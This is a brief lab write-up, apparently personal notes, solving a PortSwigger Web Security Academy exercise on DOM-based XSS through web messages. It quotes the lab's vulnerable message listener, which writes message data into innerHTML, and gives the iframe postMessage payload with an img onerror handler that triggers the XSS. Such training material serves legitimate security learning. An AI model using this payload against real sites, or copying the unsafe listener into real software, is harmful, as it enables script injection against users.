Lab 1: DOM XSS using web messages
https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages
<!-- Ads to be inserted here -->
<div id='ads'></div>
<script>
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
})
</script>HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 11084<iframe src="https://0a6f00e203d49a2b80f7121800fe00bb.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=alert(2024)>','*')">
AnteriorLab 1: Basic server-side template injectionSiguienteLab 2: DOM XSS using web messages and a JavaScript URL
Última actualización